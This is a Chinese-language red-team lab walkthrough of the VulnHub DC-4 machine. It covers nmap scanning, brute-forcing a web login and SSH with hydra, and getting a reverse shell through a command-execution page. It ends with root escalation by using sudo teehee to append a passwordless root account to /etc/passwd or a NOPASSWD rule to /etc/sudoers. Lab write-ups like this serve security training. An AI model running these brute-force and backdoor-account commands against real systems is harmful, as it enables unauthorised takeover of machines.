点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
DC-4打靶记录
靶机获取地址
https://www.vulnhub.com/entry/dc-4,313/一、存活主机探测
arp-scan -l
确定IP
192.168.117.153
二、端口信息扫描
选择快速半开全端口扫描
nmap -sS -A -T4 -p 1-65535 192.168.117.153
确定目标
先访问80 端口
三、Getshell
啊???
开局一个登录框 呢这不能忍
弱口令、万能密码、爆破
直接弱口令 + 万能密码 + 爆破一起来。
啊?这这估计是后端设置的爆破次数 怕有些师傅们字典不行
反正就是进去了
进去之后 ,啊?直接一个RCE吗?
只能执行三个吗?
我不信!抓包看一下
果然,尝试一下反弹shell
这里有个小问题 它默认用加号代替空格了
我这边等的话shell过来了
然后用python反弹出一个完整shell
python -c 'import pty;pty.spawn("/bin/bash")'
四、提权
看看/etc/passwd
老说法 咱有个22端口没有用
翻翻家目录
试试找好密码来爆破ssh到charles里面
这个时候在jim里面发现一个旧密码包
做成密码包
hydra -L xxx -P xxx ssh://xxx.xxx.xxx
成功出来一个用户名密码
登录去看看
有一个邮件 好吧
查看邮箱
cat /var/mail/jim
里面有密码
切换到charles
sudo -l发现teehee可用
teehee --help
发现可以向文件里面写入内容
所以我们有两种提权办法
方法一:写/etc/passwd文件
echo "ikkkk::0:0:root:/root:/bin/bash" | sudo teehee -a /etc/passwd方法二:写入sudoers文件
echo "charles ALL=(ALL:ALL)NOPASSWD:ALL" | sudo teehee -a /etc/sudoers"原文始发于微信公众号(SecHub网络安全社区):红队打靶 | vulnhub系列:DC-4
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论